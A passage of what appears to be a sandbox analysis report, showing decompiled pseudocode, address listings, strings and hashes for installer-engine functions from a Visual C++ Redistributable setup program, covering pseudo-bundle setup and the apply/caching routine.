				intOrPtr _t134;
				intOrPtr _t138;
				intOrPtr _t146;
				void* _t159;
				intOrPtr _t162;
				intOrPtr* _t164;
				intOrPtr* _t172;
				intOrPtr _t173;
				void* _t175;
				intOrPtr _t176;
				intOrPtr _t185;
				void* _t186;
				intOrPtr _t187;
				intOrPtr* _t189;
				intOrPtr* _t195;
				intOrPtr* _t197;
				intOrPtr _t199;
				void* _t200;

				_t186 = __edi;
				_t159 = __ebx;
				_v8 = 0;
				if(E00027EF7(_a24) != 0) {
					E00011F20( &_v8, L" -%ls", _t82);
					_t200 = _t200 + 0xc;
				}
				_push(_t159);
				_push(_t186);
				_t83 = E000138D4(8, 1);
				_t187 = _a12;
				 *((intOrPtr*)(_t187 + 0x7c)) = _t83;
				if(_t83 != 0) {
					 *((intOrPtr*)(_t187 + 0x80)) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x7c)))) = E000138D4(0x58, 1);
					_t85 =  *((intOrPtr*)(_t187 + 0x7c));
					__eflags = _t85;
					if(_t85 != 0) {
						_t162 = _a44;
						 *((intOrPtr*)( *_t85 + 4)) = 3;
						_t88 =  *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x7c))));
						 *((intOrPtr*)(_t88 + 0x10)) = _t162;
						 *((intOrPtr*)(_t88 + 0x14)) = _a48;
						_t90 = E000121A5( *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x7c)))), _a20, 0);
						__eflags = _t90;
						if(_t90 >= 0) {
							_t94 = E000121A5( *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x7c)))) + 0x18, _a32, 0);
							__eflags = _t94;
							if(_t94 >= 0) {
								_t99 = E000121A5( *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x7c)))) + 0x38, _a36, 0);
								__eflags = _t99;
								if(_t99 >= 0) {
									_t100 = _a40;
									_t172 = 0;
									__eflags = _t100;
									if(_t100 == 0) {
										L18:
										__eflags = _a72;
										if(_a72 == 0) {
											L22:
											_t173 = _a28;
											__eflags = _t173 - 4;
											if(_t173 == 4) {
												L25:
												_t185 = 1;
												_t195 = 0;
												__eflags = 0;
											} else {
												__eflags = _t173 - 3;
												if(_t173 == 3) {
													goto L25;
												} else {
													_t195 = 0;
													_t185 = 0;
												}
											}
											 *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x7c)) + 4)) = _t185;
											 *((intOrPtr*)(_t187 + 0x40)) = _t173;
											 *((intOrPtr*)(_t187 + 0xa8)) = 1;
											 *((intOrPtr*)(_t187 + 0x8c)) = 1;
											 *((intOrPtr*)(_t187 + 0x14)) = _a16;
											__eflags = _t173 - 4;
											if(_t173 == 4) {
												L29:
												_t105 = 2;
											} else {
												__eflags = _t173 - 3;
												if(_t173 == 3) {
													goto L29;
												} else {
													_t105 = _t195;
												}
											}
											 *((intOrPtr*)(_t187 + 0x28)) = _t162;
											 *((intOrPtr*)(_t187 + 0x30)) = _t162;
											 *((intOrPtr*)(_t187 + 0x44)) = _t105;
											_t106 = _a48;
											 *((intOrPtr*)(_t187 + 0x2c)) = _t106;
											 *((intOrPtr*)(_t187 + 0x34)) = _t106;
											 *((intOrPtr*)(_t187 + 0x1c)) = _a52;
											_t108 = E000121A5(_t187, _a20, 0);
											__eflags = _t108;
											if(_t108 >= 0) {
												_t52 = _t187 + 0x24; // 0x2e4
												_t197 = E000121A5(_t52, _a20, 0);
												__eflags = _t197;
												if(_t197 >= 0) {
													__eflags = _a56;
													if(_a56 == 0) {
														L37:
														_t111 = _v8;
														__eflags = _t111;
														if(_t111 == 0) {
															L40:
															__eflags = _a60;
															if(_a60 == 0) {
																L47:
																__eflags = _a64;
																if(_a64 == 0) {
																	L54:
																	_t175 = _a4 + 0xf7530000;
																	asm("adc eax, 0xfffcfff9");
																	__eflags = _a8 - 4;
																	if(__eflags > 0) {
																		L58:
																		_t113 = 0;
																		__eflags = 0;
																	} else {
																		if(__eflags < 0) {
																			L57:
																			_t113 = 1;
																		} else {
																			__eflags = _t175 - 0x9c10000;
																			if(_t175 > 0x9c10000) {
																				goto L58;
																			} else {
																				goto L57;
																			}
																		}
																	}
																	_t164 = _a68;
																	 *((intOrPtr*)(_t187 + 0xb0)) = _t113;
																	__eflags = _t164;
																	if(_t164 != 0) {
																		_t176 = E000138D4(0x10, 1);
																		 *((intOrPtr*)(_t187 + 0x84)) = _t176;
																		__eflags = _t176;
																		if(_t176 != 0) {
																			 *((intOrPtr*)(_t187 + 0x88)) = 1;
																			 *((intOrPtr*)(_t176 + 0xc)) =  *((intOrPtr*)(_t164 + 0xc));
																			_t197 = E000121A5( *((intOrPtr*)(_t187 + 0x84)),  *_t164, 0);
																			__eflags = _t197;
																			if(_t197 < 0) {
																				goto L31;
																			} else {
																				_t197 = E000121A5( *((intOrPtr*)(_t187 + 0x84)) + 4,  *((intOrPtr*)(_t164 + 4)), 0);
																				__eflags = _t197;
																				if(_t197 >= 0) {
																					_t197 = E000121A5( *((intOrPtr*)(_t187 + 0x84)) + 8,  *((intOrPtr*)(_t164 + 8)), 0);
																					__eflags = _t197;
																					if(_t197 < 0) {
																						_push("Failed to copy display name for pseudo bundle.");
																						goto L67;
																					}
																				} else {
																					_push("Failed to copy version for pseudo bundle.");
																					goto L67;
																				}
																			}
																		} else {
																			_t189 = 0x8007000e;
																			_t197 = 0x8007000e;
																			E000137D3(_t117, "pseudobundle.cpp", 0x86, 0x8007000e);
																			_push("Failed to allocate memory for dependency providers.");
																			goto L4;
																		}
																	}
																} else {
																	_t64 = _t187 + 0x9c; // 0x35c
																	_t166 = _t64;
																	_t197 = E000121A5(_t64, _a64, 0);
																	__eflags = _t197;
																	if(_t197 >= 0) {
																		_t134 = _v8;
																		__eflags = _t134;
																		if(_t134 == 0) {
																			L53:
																			 *((intOrPtr*)(_t187 + 0x18)) = 1;
																			goto L54;
																		} else {
																			_t197 = E00011EF2(_t166, _t134, 0);
																			__eflags = _t197;
																			if(_t197 >= 0) {
																				goto L53;
																			} else {
																				_push("Failed to append relation type to uninstall arguments for related bundle package");
																				goto L67;
																			}
																		}
																	} else {
																		_push("Failed to copy uninstall arguments for related bundle package");
																		goto L67;
																	}
																}
															} else {
																_t59 = _t187 + 0x98; // 0x358
																_t167 = _t59;
																_t197 = E000121A5(_t59, _a60, 0);
																__eflags = _t197;
																if(_t197 >= 0) {
																	_t138 = _v8;
																	__eflags = _t138;
																	if(_t138 == 0) {
																		L46:
																		 *((intOrPtr*)(_t187 + 0xac)) = 1;
																		goto L47;
																	} else {
																		_t197 = E00011EF2(_t167, _t138, 0);
																		__eflags = _t197;
																		if(_t197 >= 0) {
																			goto L46;
																		} else {
																			_push("Failed to append relation type to repair arguments for related bundle package");
																			goto L67;
																		}
																	}
																} else {
																	_push("Failed to copy repair arguments for related bundle package");
																	goto L67;
																}
															}
														} else {
															_t57 = _t187 + 0x94; // 0x354
															_t197 = E00011EF2(_t57, _t111, 0);
															__eflags = _t197;
															if(_t197 >= 0) {
																goto L40;
															} else {
																_push("Failed to append relation type to install arguments for related bundle package");
																goto L67;
															}
														}
													} else {
														_t55 = _t187 + 0x94; // 0x354
														_t197 = E000121A5(_t55, _a56, 0);
														__eflags = _t197;
														if(_t197 >= 0) {
															goto L37;
														} else {
															_push("Failed to copy install arguments for related bundle package");
															goto L67;
														}
													}
												} else {
													_push("Failed to copy cache id for pseudo bundle.");
													goto L67;
												}
											} else {
												L31:
												_push("Failed to copy key for pseudo bundle.");
												goto L67;
											}
										} else {
											_t199 = _a76;
											 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x7c)))) + 0x30)) = E000138D4(_t199, _t172);
											_t146 =  *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x7c))));
											__eflags =  *((intOrPtr*)(_t146 + 0x30));
											if( *((intOrPtr*)(_t146 + 0x30)) != 0) {
												 *((intOrPtr*)(_t146 + 0x34)) = _t199;
												E00031664( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x7c)))) + 0x30)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x7c)))) + 0x34)), _a72, _t199);
												goto L22;
											} else {
												_t189 = 0x8007000e;
												_t197 = 0x8007000e;
												E000137D3(_t146, "pseudobundle.cpp", 0x3f, 0x8007000e);
												_push("Failed to allocate memory for pseudo bundle payload hash.");
												goto L4;
											}
										}
									} else {
										__eflags =  *_t100;
										if( *_t100 == 0) {
											goto L18;
										} else {
											_t197 = E000121A5( *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x7c)))) + 0x40, _t100, 0);
											__eflags = _t197;
											if(_t197 >= 0) {
												_t172 = 0;
												__eflags = 0;
												goto L18;
											} else {
												_push("Failed to copy download source for pseudo bundle.");
												goto L67;
											}
										}
									}
								} else {
									_push("Failed to copy local source path for pseudo bundle.");
									goto L67;
								}
							} else {
								_push("Failed to copy filename for pseudo bundle.");
								goto L67;
							}
						} else {
							_push("Failed to copy key for pseudo bundle payload.");
							L67:
							_push(_t197);
							goto L68;
						}
					} else {
						_t189 = 0x8007000e;
						_t197 = 0x8007000e;
						E000137D3(_t85, "pseudobundle.cpp", 0x29, 0x8007000e);
						_push("Failed to allocate space for burn payload inside of related bundle struct");
						goto L4;
					}
				} else {
					_t189 = 0x8007000e;
					_t197 = 0x8007000e;
					E000137D3(_t83, "pseudobundle.cpp", 0x25, 0x8007000e);
					_push("Failed to allocate space for burn package payload inside of related bundle struct");
					L4:
					_push(_t189);
					L68:
					E0005012F();
				}
				_t114 = _v8;
				if(_v8 != 0) {
					E000554EF(_t114);
				}
				return _t197;
			}


































                                                                          0x0003c0fa
                                                                          0x0003c0fa
                                                                          0x0003c104
                                                                          0x0003c10e
                                                                          0x0003c11a
                                                                          0x0003c11f
                                                                          0x0003c11f
                                                                          0x0003c122
                                                                          0x0003c123
                                                                          0x0003c12a
                                                                          0x0003c12f
                                                                          0x0003c132
                                                                          0x0003c137
                                                                          0x0003c15b
                                                                          0x0003c169
                                                                          0x0003c16b
                                                                          0x0003c16e
                                                                          0x0003c170
                                                                          0x0003c18f
                                                                          0x0003c199
                                                                          0x0003c1a3
                                                                          0x0003c1a5
                                                                          0x0003c1a8
                                                                          0x0003c1b0
                                                                          0x0003c1b7
                                                                          0x0003c1b9
                                                                          0x0003c1d4
                                                                          0x0003c1db
                                                                          0x0003c1dd
                                                                          0x0003c1f8
                                                                          0x0003c1ff
                                                                          0x0003c201
                                                                          0x0003c20d
                                                                          0x0003c210
                                                                          0x0003c212
                                                                          0x0003c214
                                                                          0x0003c23d
                                                                          0x0003c23d
                                                                          0x0003c241
                                                                          0x0003c299
                                                                          0x0003c299
                                                                          0x0003c29c
                                                                          0x0003c29f
                                                                          0x0003c2ac
                                                                          0x0003c2ae
                                                                          0x0003c2af
                                                                          0x0003c2af
                                                                          0x0003c2a1
                                                                          0x0003c2a1
                                                                          0x0003c2a4
                                                                          0x00000000
                                                                          0x0003c2a6
                                                                          0x0003c2a6
                                                                          0x0003c2a8
                                                                          0x0003c2a8
                                                                          0x0003c2a4
                                                                          0x0003c2b4
                                                                          0x0003c2ba
                                                                          0x0003c2bd
                                                                          0x0003c2c3
                                                                          0x0003c2cc
                                                                          0x0003c2cf
                                                                          0x0003c2d2
                                                                          0x0003c2dd
                                                                          0x0003c2df
                                                                          0x0003c2d4
                                                                          0x0003c2d4
                                                                          0x0003c2d7
                                                                          0x00000000
                                                                          0x0003c2d9
                                                                          0x0003c2d9
                                                                          0x0003c2d9
                                                                          0x0003c2d7
                                                                          0x0003c2e0
                                                                          0x0003c2e3
                                                                          0x0003c2ec
                                                                          0x0003c2ef
                                                                          0x0003c2f2
                                                                          0x0003c2f5
                                                                          0x0003c2fc
                                                                          0x0003c2ff
                                                                          0x0003c306
                                                                          0x0003c308
                                                                          0x0003c318
                                                                          0x0003c321
                                                                          0x0003c323
                                                                          0x0003c325
                                                                          0x0003c331
                                                                          0x0003c334
                                                                          0x0003c356
                                                                          0x0003c356
                                                                          0x0003c359
                                                                          0x0003c35b
                                                                          0x0003c37b
                                                                          0x0003c37b
                                                                          0x0003c37e
                                                                          0x0003c3cd
                                                                          0x0003c3cd
                                                                          0x0003c3d1
                                                                          0x0003c41d
                                                                          0x0003c423
                                                                          0x0003c429
                                                                          0x0003c42e
                                                                          0x0003c431
                                                                          0x0003c442
                                                                          0x0003c442
                                                                          0x0003c442
                                                                          0x0003c433
                                                                          0x0003c433
                                                                          0x0003c43d
                                                                          0x0003c43f
                                                                          0x0003c435
                                                                          0x0003c435
                                                                          0x0003c43b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003c43b
                                                                          0x0003c433
                                                                          0x0003c444
                                                                          0x0003c447
                                                                          0x0003c44d
                                                                          0x0003c44f
                                                                          0x0003c45e
                                                                          0x0003c460
                                                                          0x0003c466
                                                                          0x0003c468
                                                                          0x0003c48b
                                                                          0x0003c498
                                                                          0x0003c4ab
                                                                          0x0003c4ad
                                                                          0x0003c4af
                                                                          0x00000000
                                                                          0x0003c4b5
                                                                          0x0003c4ca
                                                                          0x0003c4cc
                                                                          0x0003c4ce
                                                                          0x0003c4ec
                                                                          0x0003c4ee
                                                                          0x0003c4f0
                                                                          0x0003c4f2
                                                                          0x00000000
                                                                          0x0003c4f2
                                                                          0x0003c4d0
                                                                          0x0003c4d0
                                                                          0x00000000
                                                                          0x0003c4d0
                                                                          0x0003c4ce
                                                                          0x0003c46a
                                                                          0x0003c46a
                                                                          0x0003c47a
                                                                          0x0003c47c
                                                                          0x0003c481
                                                                          0x00000000
                                                                          0x0003c481
                                                                          0x0003c468
                                                                          0x0003c3d3
                                                                          0x0003c3d5
                                                                          0x0003c3d5
                                                                          0x0003c3e5
                                                                          0x0003c3e7
                                                                          0x0003c3e9
                                                                          0x0003c3f5
                                                                          0x0003c3f8
                                                                          0x0003c3fa
                                                                          0x0003c416
                                                                          0x0003c416
                                                                          0x00000000
                                                                          0x0003c3fc
                                                                          0x0003c406
                                                                          0x0003c408
                                                                          0x0003c40a
                                                                          0x00000000
                                                                          0x0003c40c
                                                                          0x0003c40c
                                                                          0x00000000
                                                                          0x0003c40c
                                                                          0x0003c40a
                                                                          0x0003c3eb
                                                                          0x0003c3eb
                                                                          0x00000000
                                                                          0x0003c3eb
                                                                          0x0003c3e9
                                                                          0x0003c380
                                                                          0x0003c382
                                                                          0x0003c382
                                                                          0x0003c392
                                                                          0x0003c394
                                                                          0x0003c396
                                                                          0x0003c3a2
                                                                          0x0003c3a5
                                                                          0x0003c3a7
                                                                          0x0003c3c3
                                                                          0x0003c3c3
                                                                          0x00000000
                                                                          0x0003c3a9
                                                                          0x0003c3b3
                                                                          0x0003c3b5
                                                                          0x0003c3b7
                                                                          0x00000000
                                                                          0x0003c3b9
                                                                          0x0003c3b9
                                                                          0x00000000
                                                                          0x0003c3b9
                                                                          0x0003c3b7
                                                                          0x0003c398
                                                                          0x0003c398
                                                                          0x00000000
                                                                          0x0003c398
                                                                          0x0003c396
                                                                          0x0003c35d
                                                                          0x0003c35f
                                                                          0x0003c36b
                                                                          0x0003c36d
                                                                          0x0003c36f
                                                                          0x00000000
                                                                          0x0003c371
                                                                          0x0003c371
                                                                          0x00000000
                                                                          0x0003c371
                                                                          0x0003c36f
                                                                          0x0003c336
                                                                          0x0003c33a
                                                                          0x0003c346
                                                                          0x0003c348
                                                                          0x0003c34a
                                                                          0x00000000
                                                                          0x0003c34c
                                                                          0x0003c34c
                                                                          0x00000000
                                                                          0x0003c34c
                                                                          0x0003c34a
                                                                          0x0003c327
                                                                          0x0003c327
                                                                          0x00000000
                                                                          0x0003c327
                                                                          0x0003c30a
                                                                          0x0003c30a
                                                                          0x0003c30a
                                                                          0x00000000
                                                                          0x0003c30a
                                                                          0x0003c243
                                                                          0x0003c243
                                                                          0x0003c252
                                                                          0x0003c25a
                                                                          0x0003c25c
                                                                          0x0003c25f
                                                                          0x0003c27f
                                                                          0x0003c291
                                                                          0x00000000
                                                                          0x0003c261
                                                                          0x0003c261
                                                                          0x0003c26e
                                                                          0x0003c270
                                                                          0x0003c275
                                                                          0x00000000
                                                                          0x0003c275
                                                                          0x0003c25f
                                                                          0x0003c216
                                                                          0x0003c216
                                                                          0x0003c219
                                                                          0x00000000
                                                                          0x0003c21b
                                                                          0x0003c22b
                                                                          0x0003c22d
                                                                          0x0003c22f
                                                                          0x0003c23b
                                                                          0x0003c23b
                                                                          0x00000000
                                                                          0x0003c231
                                                                          0x0003c231
                                                                          0x00000000
                                                                          0x0003c231
                                                                          0x0003c22f
                                                                          0x0003c219
                                                                          0x0003c203
                                                                          0x0003c203
                                                                          0x00000000
                                                                          0x0003c203
                                                                          0x0003c1df
                                                                          0x0003c1df
                                                                          0x00000000
                                                                          0x0003c1df
                                                                          0x0003c1bb
                                                                          0x0003c1bb
                                                                          0x0003c4f7
                                                                          0x0003c4f7
                                                                          0x00000000
                                                                          0x0003c4f7
                                                                          0x0003c172
                                                                          0x0003c172
                                                                          0x0003c17f
                                                                          0x0003c181
                                                                          0x0003c186
                                                                          0x00000000
                                                                          0x0003c186
                                                                          0x0003c139
                                                                          0x0003c139
                                                                          0x0003c146
                                                                          0x0003c148
                                                                          0x0003c14d
                                                                          0x0003c152
                                                                          0x0003c152
                                                                          0x0003c4f8
                                                                          0x0003c4f8
                                                                          0x0003c4fe
                                                                          0x0003c4ff
                                                                          0x0003c506
                                                                          0x0003c509
                                                                          0x0003c509
                                                                          0x0003c514

                                                                          Strings
                                                                          • Failed to copy uninstall arguments for related bundle package, xrefs: 0003C3EB
                                                                          • Failed to copy local source path for pseudo bundle., xrefs: 0003C203
                                                                          • Failed to append relation type to uninstall arguments for related bundle package, xrefs: 0003C40C
                                                                          • Failed to copy display name for pseudo bundle., xrefs: 0003C4F2
                                                                          • Failed to allocate space for burn package payload inside of related bundle struct, xrefs: 0003C14D
                                                                          • Failed to copy install arguments for related bundle package, xrefs: 0003C34C
                                                                          • Failed to allocate memory for dependency providers., xrefs: 0003C481
                                                                          • Failed to copy key for pseudo bundle payload., xrefs: 0003C1BB
                                                                          • Failed to copy filename for pseudo bundle., xrefs: 0003C1DF
                                                                          • Failed to append relation type to install arguments for related bundle package, xrefs: 0003C371
                                                                          • Failed to allocate memory for pseudo bundle payload hash., xrefs: 0003C275
                                                                          • -%ls, xrefs: 0003C114
                                                                          • pseudobundle.cpp, xrefs: 0003C141, 0003C17A, 0003C269, 0003C475
                                                                          • Failed to copy key for pseudo bundle., xrefs: 0003C30A
                                                                          • Failed to copy cache id for pseudo bundle., xrefs: 0003C327
                                                                          • Failed to copy version for pseudo bundle., xrefs: 0003C4D0
                                                                          • Failed to copy download source for pseudo bundle., xrefs: 0003C231
                                                                          • Failed to copy repair arguments for related bundle package, xrefs: 0003C398
                                                                          • Failed to append relation type to repair arguments for related bundle package, xrefs: 0003C3B9
                                                                          • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 0003C186
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocateProcess
                                                                          • String ID: -%ls$Failed to allocate memory for dependency providers.$Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of related bundle struct$Failed to allocate space for burn payload inside of related bundle struct$Failed to append relation type to install arguments for related bundle package$Failed to append relation type to repair arguments for related bundle package$Failed to append relation type to uninstall arguments for related bundle package$Failed to copy cache id for pseudo bundle.$Failed to copy display name for pseudo bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy install arguments for related bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy key for pseudo bundle.$Failed to copy local source path for pseudo bundle.$Failed to copy repair arguments for related bundle package$Failed to copy uninstall arguments for related bundle package$Failed to copy version for pseudo bundle.$pseudobundle.cpp
                                                                          • API String ID: 1357844191-2832335422
                                                                          • Opcode ID: acadbe4af3698903eb3cd431dc8c9eb90642f5a31d1ff260c0bcd6e3f8d332da
                                                                          • Instruction ID: da1616a652bbcac65093e95bfae9aff645c7dadebd5d0e9cc1904dbf2f7386a2
                                                                          • Opcode Fuzzy Hash: acadbe4af3698903eb3cd431dc8c9eb90642f5a31d1ff260c0bcd6e3f8d332da
                                                                          • Instruction Fuzzy Hash: 2DC1A071A40656BBEB66DE68C851EBA76EDBF08710F004129FD05FB242DB71EC509B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000269CC Relevance: 33.6, APIs: 6, Strings: 13, Instructions: 358synchronizationCOMMONCrypto
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 63%
                                                                          			E000269CC(intOrPtr _a4, signed int _a8) {
				void* _v8;
				char _v12;
				signed short _v16;
				void* _v20;
				signed short _v24;
				char _v28;
				signed short _v32;
				signed short _v36;
				signed short _v40;
				char _v44;
				signed short* _v48;
				char* _v52;
				void _v56;
				void* __ebx;
				intOrPtr* _t112;
				intOrPtr* _t122;
				void* _t134;
				signed short _t148;
				signed short _t151;
				void* _t158;
				signed int _t160;
				intOrPtr* _t168;
				void _t181;
				signed short _t182;
				signed short _t184;
				signed short _t188;

				_v36 =  *(_a4 + 0x428);
				_t158 = 0;
				_v44 = 0;
				asm("stosd");
				_push(0x2000012c);
				_push(2);
				_v20 = 0;
				asm("stosd");
				_v28 = 0;
				_v8 = 0;
				_v40 = 0;
				_v32 = 0;
				_v16 = 0;
				_v24 = 0;
				_v12 = 0;
				asm("stosd");
				E0001550F();
				_t181 = _a4;
				_t182 = E0001D39D(_t181 + 0xb8,  &_v44);
				if(_t182 >= 0) {
					E0003BC8F(__eflags, _t181 + 0xb8, _t181 + 0x2c0);
					_t168 =  *((intOrPtr*)(_t181 + 0xc8));
					__eflags =  *(_t181 + 0x460);
					_t160 = 0 |  *(_t181 + 0x460) != 0x00000000;
					__eflags =  *(_t181 + 0x470);
					_t179 =  *_t168;
					_t24 = _t160 + 1; // 0x1
					_t110 =  ==  ? _t160 : _t24;
					 *((intOrPtr*)( *_t168 + 0x70))(_t168,  ==  ? _t160 : _t24);
					_t112 =  *((intOrPtr*)(_t181 + 0xc8));
					_t169 =  *_t112;
					_t184 = E0001D58B(_t181 + 0xb8, 1,  *((intOrPtr*)( *_t112 + 0x6c))(_t112));
					__eflags = _t184;
					if(_t184 >= 0) {
						__eflags =  *((intOrPtr*)(_t181 + 0x30)) - 3;
						if( *((intOrPtr*)(_t181 + 0x30)) != 3) {
							_push( &_v20);
							_push(0);
							__eflags = E0003BADF();
							if(__eflags >= 0) {
								E0003BAD3(_t116);
								_t163 = _t181 + 0x88;
								 *(_t181 + 0xf0) = _a8;
								_t182 = E0003BCC0(_t169, __eflags, _t181 + 0x88);
								__eflags = _t182;
								if(_t182 >= 0) {
									_t170 = 0;
									__eflags =  *(_t181 + 0x450);
									if( *(_t181 + 0x450) != 0) {
										L18:
										_t120 = _t181 + 0x49c;
										__eflags =  *_t120 - _t170;
										if( *_t120 != _t170) {
											L22:
											__eflags =  *((intOrPtr*)(_t181 + 0x41c)) - _t170;
											if( *((intOrPtr*)(_t181 + 0x41c)) == _t170) {
												L28:
												__eflags =  *((intOrPtr*)(_t181 + 0x420)) - _t170;
												if(__eflags == 0) {
													L32:
													__eflags =  *(_t181 + 0x460) - _t170;
													if( *(_t181 + 0x460) == _t170) {
														_t158 = _v8;
														L41:
														__eflags =  *(_t181 + 0x470) - _t170;
														if(__eflags != 0) {
															_t182 = E0003B98B(__eflags, _t181, _t158,  &_v28,  &_v36,  &_v16,  &_v24,  &_v12);
															_t120 = E0001D51C(_t181 + 0xb8, _t182);
														}
														__eflags = _t158;
														if(_t158 == 0) {
															L46:
															__eflags = _t182;
															if(_t182 >= 0) {
																__eflags = _v16;
																if(_v16 == 0) {
																	__eflags = _v24;
																	if(_v24 == 0) {
																		__eflags = _v12 - 2;
																		if(_v12 != 2) {
																			__eflags =  *(_t181 + 0x480);
																			if( *(_t181 + 0x480) != 0) {
																				_t120 = E0003B962(_t181 + 0xb8, _t181 + 0x410,  *((intOrPtr*)(_t181 + 0x4b0)));
																			}
																		}
																	}
																}
															}
															goto L52;
														} else {
															_t120 = E000267B0(_t170, _t158);
															__eflags = _t182;
															if(_t182 < 0) {
																L52:
																__eflags = _v32;
																if(_v32 == 0) {
																	L62:
																	__eflags = _v40;
																	if(_v40 != 0) {
																		_t120 = E0002CE6D(_t170, _t179,  *((intOrPtr*)(_t181 + 0x4b0)));
																	}
																	goto L64;
																}
																__eflags = _v36;
																if(_v36 != 0) {
																	L56:
																	_t170 = 1;
																	__eflags = 1;
																	L57:
																	__eflags = _t182;
																	if(_t182 < 0) {
																		L60:
																		_t134 = 1;
																		__eflags = 1;
																		L61:
																		_t120 = E0003BCFB(_t179, _t181, _t134, _t170, _v24, _v12);
																		goto L62;
																	}
																	__eflags = _v16;
																	if(_v16 != 0) {
																		goto L60;
																	}
																	_t134 = 0;
																	goto L61;
																}
																__eflags =  *(_t181 + 0x42c);
																if( *(_t181 + 0x42c) != 0) {
																	goto L56;
																}
																_t170 = 0;
																goto L57;
															}
															_t182 = _t120;
															goto L46;
														}
													}
													_v56 = _t181;
													_v52 =  &_v28;
													_v48 =  &_v16;
													_t158 = CreateThread(_t170, _t170, E000255BD,  &_v56, _t170, _t170);
													__eflags = _t158;
													if(_t158 != 0) {
														_t170 = 0;
														__eflags =  *(_t181 + 0x3f0);
														if( *(_t181 + 0x3f0) != 0) {
															goto L41;
														}
														_t182 = E000267B0(0, _t158);
														__eflags = _t182;
														if(_t182 >= 0) {
															_t120 = CloseHandle(_t158);
															_t170 = 0;
															_t158 = 0;
															goto L41;
														}
														_push("Failed while caching, aborting execution.");
														L35:
														_t120 = E0005012F();
														_t170 = _t182;
														goto L52;
													}
													_t148 = GetLastError();
													__eflags = _t148;
													_t188 =  <=  ? _t148 : _t148 & 0x0000ffff | 0x80070000;
													__eflags = _t188;
													_t182 =  >=  ? 0x80004005 : _t188;
													E000137D3(0x80004005, "core.cpp", 0x280, _t182);
													_push("Failed to create cache thread.");
													goto L35;
												}
												_t182 = E0003BAE4(_t163, _t170, _t179, __eflags, _t181);
												__eflags = _t182;
												if(_t182 >= 0) {
													_v32 = 1;
													_t170 = 0;
													__eflags = 0;
													goto L32;
												}
												_push("Failed to register bundle.");
												_t120 = E0005012F();
												_t158 = _v8;
												_t170 = _t182;
												goto L62;
											}
											_t151 = E00027297(_t163, _t170, _t179, _t181,  *(_t181 + 0xf0));
											__eflags = _t151;
											if(_t151 >= 0) {
												__eflags =  *(_t181 + 0x3ec);
												_t182 = E0002CD9A(_t179,  *(_t181 + 0x3ec),  *((intOrPtr*)(_t181 + 0x4b0)), _t163,  *((intOrPtr*)(_t181 + 0x410)),  *((intOrPtr*)(_t181 + 0x494)), 0 |  *(_t181 + 0x3ec) == 0x00000000);
												__eflags = _t182;
												if(_t182 >= 0) {
													_v40 = 1;
													_t170 = 0;
													__eflags = 0;
													goto L28;
												}
												_push("Another per-machine setup is already executing.");
												goto L4;
											}
											_push("Failed to elevate.");
											goto L4;
										}
										_t182 = _t120;
										__eflags = _t182;
										if(_t182 >= 0) {
											_t170 = 0;
											__eflags = 0;
											goto L22;
										}
										_push("Failed to cache engine to working directory.");
										goto L4;
									}
									__eflags =  *(_t181 + 0x460);
									if( *(_t181 + 0x460) != 0) {
										goto L18;
									}
									__eflags =  *(_t181 + 0x470);
									if( *(_t181 + 0x470) != 0) {
										goto L18;
									}
									__eflags =  *(_t181 + 0x480);
									if( *(_t181 + 0x480) != 0) {
										goto L18;
									}
									_push(0xa000017c);
									_push(2);
									_t120 = E0001550F();
									goto L5;
								} else {
									_push("Failed to set initial apply variables.");
									goto L4;
								}
							} else {
								_push("Another per-user setup is already executing.");
								goto L4;
							}
						} else {
							_v12 = 1;
							_t182 = 0x8007015e;
							_t120 = E0001D742(_t169,  *((intOrPtr*)(_t181 + 0xc8)), 5, 0, 0x8007015e, 0, 0x10, 0);
							goto L6;
						}
					} else {
						E000137D3(_t114, "core.cpp", 0x23e, _t184);
						_push("UX aborted apply begin.");
						L4:
						_push(_t182);
						_t120 = E0005012F();
						L5:
						L6:
						_t158 = _v8;
						goto L64;
					}
				} else {
					_push("Engine cannot start apply because it is busy with another action.");
					_push(_t182);
					_t120 = E0005012F();
					L64:
					 *(_t181 + 0xf0) =  *(_t181 + 0xf0) & 0x00000000;
					E0003BCEF(_t120);
					if(_v20 != 0) {
						ReleaseMutex(_v20);
						CloseHandle(_v20);
					}
					if(_v44 != 0) {
						E0001D443(_t181 + 0xb8);
					}
					if(_t158 != 0) {
						CloseHandle(_t158);
					}
					_t122 =  *((intOrPtr*)(_t181 + 0xc8));
					_push(_v12);
					_push(_t182);
					_push(_t122);
					if( *((intOrPtr*)( *_t122 + 0xd8))() == 0x66) {
						 *(_t181 + 0x18) = 1;
					}
					_push(E00023C30( *(_t181 + 0x18)));
					_push(E00024224(_v12));
					E0001550F(2, 0x2000018f, _t182);
					return _t182;
				}
			}





























                                                                          0x000269e3
                                                                          0x000269e6
                                                                          0x000269ea
